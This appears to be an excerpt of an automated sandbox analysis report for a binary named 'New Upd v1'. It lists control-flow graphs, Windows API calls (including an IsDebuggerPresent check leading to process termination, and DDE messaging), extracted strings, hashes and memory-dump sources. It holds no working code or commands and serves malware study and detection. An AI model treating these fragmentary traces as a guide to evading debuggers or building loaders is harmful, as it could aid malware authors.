                                                                                • Opcode Fuzzy Hash: a3c5115e678ea162abfd707b6b8fda01a5bd49db733d15370f78b5bfd95c4a57
                                                                                • Instruction Fuzzy Hash: FB613779A0420CEBDB14CFA4DC99BBE77B5BF88305F108909F71A9A390C7B89944DB51

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 945 7ff400-7ff468 _memset * 2 LoadLibraryA 946 7ff48c-7ff48f 945->946 947 7ff46a-7ff480 GetProcAddress 945->947 947->946 948 7ff482-7ff489 947->948 948->946
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007FF40E
                                                                                • _memset.LIBCMT ref: 007FF440
                                                                                • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 007FF45B
                                                                                • GetProcAddress.KERNEL32(00000000,PropertySheetA), ref: 007FF473
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$AddressLibraryLoadProc
                                                                                • String ID: 4$4$COMCTL32.DLL$PropertySheetA
                                                                                • API String ID: 3951463162-1160762502
                                                                                • Opcode ID: 0551e668e0fa2615ff3d5cf5645bba2ef984c77aa865fe237652032db87b443c
                                                                                • Instruction ID: 44799b7b43eed9122d1abaabe2ea833a3ae926560ab7604ef60ea11f4786617f
                                                                                • Opcode Fuzzy Hash: 0551e668e0fa2615ff3d5cf5645bba2ef984c77aa865fe237652032db87b443c
                                                                                • Instruction Fuzzy Hash: 0B011BB0D01308EBDB14EFE4E849BEDBB78BB04708F104128E615AB281DBB85648CF46

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 950 80735c-80735f 951 807361-807365 950->951 952 807388-8073bf 950->952 953 807c73-807c97 951->953 954 80736b-807383 951->954 955 8073c1-8073c5 952->955 956 8073d3-8073da 952->956 957 807ca9-807cc0 call 806a8c 953->957 958 807c99-807ca7 953->958 954->951 959 807385 954->959 955->956 960 8073c7-8073d1 955->960 961 807c1f 956->961 975 806bc9-806bce 957->975 958->957 959->952 965 807425-80742b 960->965 964 807c25-807c30 961->964 964->975 966 80742d 965->966 967 8073fe-807401 965->967 972 807443-807447 966->972 970 807403-807422 967->970 971 8073df-8073e3 967->971 970->965 971->953 978 8073e9-8073fb 971->978 976 807449-80747e call 809aff 972->976 977 80742f-807440 972->977 981 807480-80748a 976->981 982 80748f-807499 976->982 977->972 978->967 981->961 983 8076a1-8076aa 982->983 984 8076b0 983->984 985 8074bd-8074db 983->985 986 80763d-807640 984->986 987 8074dd-8074e6 985->987 988 80749e-8074a2 985->988 986->964 989 807646-80767c call 809aff 986->989 991 807536-80753b 987->991 992 8074e8-8074f0 987->992 988->953 990 8074a8-8074ba 988->990 1008 8076c1-8076f5 call 809aff 989->1008 1009 80767e-807688 989->1009 990->985 993 807596-80759e 991->993 994 80753d-807540 991->994 996 807514-807516 992->996 1001 8075a0 993->1001 1002 8075fa-8075ff 993->1002 999 807561-807566 994->999 997 8074f2-8074f6 996->997 998 807518-807531 996->998 997->953 1003 8074fc-807511 997->1003 998->983 1006 807542-807546 999->1006 1007 807568-807576 999->1007 1010 8075c1-8075c6 1001->1010 1004 807601-80760f 1002->1004 1005 8075db-8075df 1002->1005 1003->996 1013 807612-807619 1004->1013 1005->953 1011 8075e5-8075f7 1005->1011 1006->953 1014 80754c-80755e 1006->1014 1015 8076b2-8076bc 1007->1015 1016 80757c-807591 1007->1016 1022 807706-807710 1008->1022 1023 8076f7-807701 1008->1023 1009->961 1017 8075a2-8075a6 1010->1017 1018 8075c8-8075d9 1010->1018 1011->1002 1020 80761b-80762b 1013->1020 1014->999 1015->961 1016->1020 1017->953 1021 8075ac-8075be 1017->1021 1018->1013 1024 80769d-80769f 1020->1024 1025 80762d-807637 1020->1025 1021->1010 1026 807712-807719 1022->1026 1027 80776e-80777f 1022->1027 1023->961 1024->983 1028 80768d-80769a 1024->1028 1025->986 1026->1027 1029 80771b-807769 call 809723 1026->1029 1030 8077b1-8077bb 1027->1030 1028->1024 1029->964 1032 807781-807785 1030->1032 1033 8077bd-8077bf 1030->1033 1032->953 1035 80778b-8077ae 1032->1035 1036 8077c5-8077c7 1033->1036 1037 807856-80786f 1033->1037 1035->1030 1036->1037 1038 8077cd-8077ff 1036->1038 1039 807871-807877 1037->1039 1040 80787c-80787e 1037->1040 1041 807840-80784c 1038->1041 1039->964 1042 807880-807886 1040->1042 1043 80788b-80788d 1040->1043 1044 807801-807805 1041->1044 1045 80784e-807854 1041->1045 1042->964 1046 80789e-8078af 1043->1046 1047 80788f-807899 1043->1047 1044->953 1048 80780b-80783d 1044->1048 1045->1037 1049 8078b1-8078b3 1046->1049 1050 8078ea-807901 1046->1050 1047->961 1048->1041 1052 8078b5-8078b9 1049->1052 1053 8078d9-8078e8 1049->1053 1051 807933-80793d 1050->1051 1054 807903-807907 1051->1054 1055 80793f-807941 1051->1055 1052->953 1056 8078bf-8078d7 1052->1056 1053->1050 1054->953 1057 80790d-807930 1054->1057 1058 8079d0-8079e1 1055->1058 1059 807947-807979 1055->1059 1056->1052 1056->1053 1057->1051 1061 8079f2-807a0e 1058->1061 1062 8079e3-8079ed 1058->1062 1060 8079ba-8079c6 1059->1060 1063 8079c8-8079ce 1060->1063 1064 80797b-80797f 1060->1064 1065 807a50-807a5c 1061->1065 1066 807a10-807a12 1061->1066 1062->961 1063->1058 1064->953 1069 807985-8079b7 1064->1069 1067 807a6a-807a74 1065->1067 1068 807a5e-807a65 1065->1068 1070 807a14-807a18 1066->1070 1071 807a3b-807a4d 1066->1071 1067->953 1072 807a7a-807a85 1067->1072 1068->961 1069->1060 1070->953 1073 807a1e-807a36 1070->1073 1071->1065 1075 807ab4-807abc 1072->1075 1076 807a87-807a95 1072->1076 1073->1070 1074 807a38 1073->1074 1074->1071 1079 807abf 1075->1079 1077 807aa2-807aa5 1076->1077 1078 807a97-807aa0 1076->1078 1080 807aa7-807ab0 1077->1080 1078->1080 1081 807ac2-807ac8 1079->1081 1080->1081 1082 807ab2 1080->1082 1083 807aca 1081->1083 1084 807acd-807ad9 1081->1084 1082->1079 1083->1084 1085 807adc-807aea 1084->1085 1085->1085 1086 807aec-807af0 1085->1086 1086->964 1087 807af6-807b16 1086->1087 1087->964
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                • API String ID: 0-3031085480
                                                                                • Opcode ID: 8240d85a1e4b4bcdcac9bebfde345d9fc86aaeb43c066a47f94f901a6f9d2ccd
                                                                                • Instruction ID: 84eb2c4d5ef9730ad3905dd7fa8a85ae6ef186d8eca7ae16227a08c9ad086ba9
                                                                                • Opcode Fuzzy Hash: 8240d85a1e4b4bcdcac9bebfde345d9fc86aaeb43c066a47f94f901a6f9d2ccd
                                                                                • Instruction Fuzzy Hash: EF528871E04A198FDB58CF68C8906ADBBF2FF84315F18446ED882D7790D774AA84DB50
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00811D1F
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00811D34
                                                                                • UnhandledExceptionFilter.KERNEL32(00840A38), ref: 00811D3F
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00811D5B
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00811D62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID:
                                                                                • API String ID: 2579439406-0
                                                                                • Opcode ID: 202151486e2c0bdf57f16bb4e20063e18f45fb08e5b5a72dd5ca99de6a671c5b
                                                                                • Instruction ID: 570db7a35d4f5945d24c6ac736c4470829afc8e176e228cf640d083baece1882
                                                                                • Opcode Fuzzy Hash: 202151486e2c0bdf57f16bb4e20063e18f45fb08e5b5a72dd5ca99de6a671c5b
                                                                                • Instruction Fuzzy Hash: C821BEB89083059FC755DF28FDC8A983BA8FB4A314F50585AE948973B0EBB85984CF45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E37000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_e37000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: C:\P$C:\P$C:\U$x86$x86
                                                                                • API String ID: 0-63958657
                                                                                • Opcode ID: c8ddd11d5a5529db87c121562458914e1fe71ae6a35a246c196f30eb88e6d3f1
                                                                                • Instruction ID: 073d82bbc20f02e170c28eb9b0077defc4bc8bfabe17c3ceb1f6804a8c872cd3
                                                                                • Opcode Fuzzy Hash: c8ddd11d5a5529db87c121562458914e1fe71ae6a35a246c196f30eb88e6d3f1
                                                                                • Instruction Fuzzy Hash: 4D12779244E7C01FD72B83704D6D962BF75AE63208B0E96CFD4C69F4E3D659980AC362
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00801062
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0080114F
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008011AF
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008011C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Time$FileSystem
                                                                                • String ID:
                                                                                • API String ID: 2644170505-0
                                                                                • Opcode ID: 1194a3a8c28169ec708184c3bd52bc0c842b6905e528733fd0b9db92a219fbb0
                                                                                • Instruction ID: addf733738c548173a65405ce0b532355d20bb4d019687bd20cfbca0b0e1c1c1
                                                                                • Opcode Fuzzy Hash: 1194a3a8c28169ec708184c3bd52bc0c842b6905e528733fd0b9db92a219fbb0
                                                                                • Instruction Fuzzy Hash: 5051C5B4E006589BCB64CF98DC85BEEBBB5FB89310F108599E519A7390D735AA80CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: c1df472a9c6741918bde814ac0d856a284ee7a90a3433338481c7132581bb492
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: A3112B7724208183D6D48A7DDDB46B7A79EFFC532172C4B7AF181CBBD8D222E9459500

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 007EC500: GetModuleHandleA.KERNEL32(00000000), ref: 007EC53B
                                                                                  • Part of subcall function 007EC500: LoadCursorA.USER32(00000000,00007F00), ref: 007EC552
                                                                                  • Part of subcall function 007EC500: RegisterClassW.USER32(0000000B), ref: 007EC573
                                                                                  • Part of subcall function 007EC500: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 007EC57D
                                                                                  • Part of subcall function 007EC500: CreateWindowExW.USER32(00040300,0083BA74,DDE Processing,02CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 007EC5AF
                                                                                • GetTickCount.KERNEL32 ref: 007EC09F
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 007EC0C6
                                                                                • TranslateMessage.USER32(?), ref: 007EC0D4
                                                                                • DispatchMessageA.USER32(?), ref: 007EC0DE
                                                                                • GetTickCount.KERNEL32 ref: 007EC0FE
                                                                                • GetTickCount.KERNEL32 ref: 007EC115
                                                                                • EnumWindows.USER32(007EC400,00000000), ref: 007EC12E
                                                                                • IsWindow.USER32(00000000), ref: 007EC140
                                                                                • Sleep.KERNEL32(00000001), ref: 007EC393
                                                                                  • Part of subcall function 007ECDB0: _memset.LIBCMT ref: 007ECDDE
                                                                                  • Part of subcall function 007ECE30: _memset.LIBCMT ref: 007ECE5E
                                                                                  • Part of subcall function 007EBC70: GetVersionExA.KERNEL32(00000094), ref: 007EBC9F
                                                                                • IsWindowUnicode.USER32(00000000), ref: 007EC1A3
                                                                                • GlobalAlloc.KERNEL32(00002002,?), ref: 007EC1C8
                                                                                • GlobalLock.KERNEL32(?), ref: 007EC1D5
                                                                                • _wcscpy.LIBCMT ref: 007EC1EB
                                                                                • GlobalUnlock.KERNEL32(?), ref: 007EC1F7
                                                                                • PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC208
                                                                                • PostMessageW.USER32(00000000,000003E8,00000000,00000000), ref: 007EC220
                                                                                • _strlen.LIBCMT ref: 007EC253
                                                                                • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 007EC264
                                                                                • GlobalLock.KERNEL32(?), ref: 007EC271
                                                                                • GlobalUnlock.KERNEL32(?), ref: 007EC293
                                                                                • PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC2A4
                                                                                • PostMessageA.USER32(00000000,000003E8,00000000,00000000), ref: 007EC2BC
                                                                                • _strlen.LIBCMT ref: 007EC2F4
                                                                                • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 007EC305
                                                                                • GlobalLock.KERNEL32(?), ref: 007EC312
                                                                                • GlobalUnlock.KERNEL32(?), ref: 007EC334
                                                                                • PackDDElParam.USER32(000003E8,00000000,?), ref: 007EC345
                                                                                • PostMessageA.USER32(00000000,000003E8,00000000,00000000), ref: 007EC35D
                                                                                  • Part of subcall function 007EBF40: EnterCriticalSection.KERNEL32(?), ref: 007EBF50
                                                                                  • Part of subcall function 007EBF40: _wcsncpy.LIBCMT ref: 007EBFAA
                                                                                  • Part of subcall function 007EBF40: codecvt.LIBCPMTD ref: 007EBFD6
                                                                                  • Part of subcall function 007EBF40: LeaveCriticalSection.KERNEL32(?), ref: 007EBFF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Message$AllocCountLockPackParamPostTickUnlockWindow$CriticalHandleModuleSection_memset_strlen$ClassCreateCursorDispatchEnterEnumLeaveLoadPeekRegisterSleepTranslateUnicodeVersionWindows_wcscpy_wcsncpycodecvt
                                                                                • String ID:
                                                                                • API String ID: 1423932449-0
                                                                                • Opcode ID: 87506c53d0a50df46a967a8bf45bb915cd354bec8ecdbcc7c488871017bd43bd
                                                                                • Instruction ID: 92f92c2bfa6e7a9e9130f554b5af018f02914e53e5a52347b561f7c590bb38f2
                                                                                • Opcode Fuzzy Hash: 87506c53d0a50df46a967a8bf45bb915cd354bec8ecdbcc7c488871017bd43bd
                                                                                • Instruction Fuzzy Hash: 7181C0B9902244EBDB09EBE5DC89FAE7B78FB4C700F004518F515E62D1DBB89905CB62

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 735 7f32b0-7f337a GetModuleHandleA call 805a70 call 809ee4 _memset call 7f3720 call 81a721 744 7f347c-7f3495 call 8166c7 735->744 745 7f3380-7f33a6 _strlen 735->745 753 7f34b7-7f34d0 call 8166c7 744->753 754 7f3497-7f34b2 call 80ccd0 744->754 747 7f33ac-7f33c8 call 8166c7 745->747 748 7f3463-7f3479 call 7f3720 745->748 758 7f33ca-7f33d4 747->758 759 7f33d9-7f33f5 call 8166c7 747->759 748->744 765 7f34f2-7f350b call 8166c7 753->765 766 7f34d2-7f34ed call 80ccd0 753->766 764 7f366a-7f3676 call 7f2710 754->764 758->748 767 7f33f7-7f3401 759->767 768 7f3403-7f3409 759->768 780 7f36de-7f3711 call 80aed5 764->780 781 7f3678-7f36a0 call 7f0a90 call 80ccd0 call 7f0ab0 _strlen 764->781 776 7f350d-7f3517 765->776 777 7f351c-7f3535 call 8166c7 765->777 766->764 767->748 772 7f340c-7f3414 768->772 778 7f3436-7f343e 772->778 779 7f3416-7f3427 call 80dd98 772->779 776->764 793 7f3537-7f3541 777->793 794 7f3546-7f355f call 8166c7 777->794 786 7f345c 778->786 787 7f3440-7f345a call 7f3790 778->787 795 7f342b-7f3434 779->795 796 7f3429 779->796 807 7f36cb-7f36d8 MessageBoxA 781->807 808 7f36a2-7f36c8 call 80cce0 call 7f0ab0 call 80cce0 781->808 786->748 787->748 793->764 803 7f3561-7f356b 794->803 804 7f3570-7f3589 call 8166c7 794->804 795->772 796->778 803->764 811 7f358b-7f3595 804->811 812 7f359a-7f35b3 call 8166c7 804->812 807->780 808->807 811->764 818 7f35b5-7f35bf 812->818 819 7f35c4-7f35dd call 8166c7 812->819 818->764 824 7f35df-7f35e9 819->824 825 7f35eb-7f3604 call 8166c7 819->825 824->764 828 7f3606-7f3610 825->828 829 7f3612-7f362b call 8166c7 825->829 828->764 832 7f362d-7f3637 829->832 833 7f3639-7f3654 call 81a721 829->833 832->764 833->764 836 7f3656-7f3667 call 80ccd0 833->836 836->764
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,A407B194), ref: 007F32D7
                                                                                  • Part of subcall function 00805A70: GetModuleHandleA.KERNEL32(00000000), ref: 00805A8B
                                                                                  • Part of subcall function 00805A70: _memset.LIBCMT ref: 00805AAD
                                                                                  • Part of subcall function 00805A70: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00805AC5
                                                                                  • Part of subcall function 00805A70: _strrchr.LIBCMT ref: 00805AD4
                                                                                  • Part of subcall function 00805A70: _strrchr.LIBCMT ref: 00805AF7
                                                                                  • Part of subcall function 00805A70: _sprintf.LIBCMT ref: 00805B37
                                                                                • _memset.LIBCMT ref: 007F3337
                                                                                  • Part of subcall function 007F3720: _strncpy.LIBCMT ref: 007F3777
                                                                                • _strlen.LIBCMT ref: 007F339B
                                                                                • _strlen.LIBCMT ref: 007F3696
                                                                                • MessageBoxA.USER32(00000000,?,00000000,00040010), ref: 007F36D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Module$Handle_memset_strlen_strrchr$FileMessageName_sprintf_strncpy
                                                                                • String ID: ARMDEBUG=$DOWN$FIXCLOCK$HWCHANGELOG$INFO$QUIETEXIT$QUIETREGISTER$QUIETUNREGISTER$REGISTER$SERVER$SHOWNETUSERS$TRANSFER$UNREGISTER
                                                                                • API String ID: 1944943824-1461945346
                                                                                • Opcode ID: ceb53c1f2e383db1865a1841a5fc5bd8127eab9c924fc304b49a139391101bed
                                                                                • Instruction ID: c5209f92dd034238ca555038c5e2122246f77720475bedd18218c7b69aa3c0d1
                                                                                • Opcode Fuzzy Hash: ceb53c1f2e383db1865a1841a5fc5bd8127eab9c924fc304b49a139391101bed
                                                                                • Instruction Fuzzy Hash: 3BC18DF5E04249DBDB04DFA8DD81ABEB7B4FF44704F104119E905AB381E7799A14CBA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 007FA3CD
                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 007FA3D4
                                                                                  • Part of subcall function 007FA6D0: GetExitCodeProcess.KERNEL32(?,008475B8), ref: 007FA6DC
                                                                                • WaitForInputIdle.USER32(?,000001F4), ref: 007FA3FC
                                                                                • Sleep.KERNEL32(000000FA), ref: 007FA410
                                                                                • WaitForInputIdle.USER32(?,00007530), ref: 007FA443
                                                                                • Sleep.KERNEL32(000001F4), ref: 007FA44E
                                                                                • GetTickCount.KERNEL32 ref: 007FA460
                                                                                • _memset.LIBCMT ref: 007FA54C
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000000A,00000000), ref: 007FA560
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?), ref: 007FA5A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: HandleIdleInputModuleSleepThreadWait$CodeCountCurrentExitPriorityProcessTick_memset
                                                                                • String ID:
                                                                                • API String ID: 3765605693-0
                                                                                • Opcode ID: 89245f2ba8aa272d2f546901440f7f4dee47a6f8916700a55bd5b4494d66de3c
                                                                                • Instruction ID: 1cfc03036ba6805537f42530d8e82f33d49e934ac8d71529cbc19b57b9a2ff86
                                                                                • Opcode Fuzzy Hash: 89245f2ba8aa272d2f546901440f7f4dee47a6f8916700a55bd5b4494d66de3c
                                                                                • Instruction Fuzzy Hash: 76819EB1D04258EBDB24DF64DC5ABFEB774FF44300F1445A8E60AA6281EBB86A44CF51

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
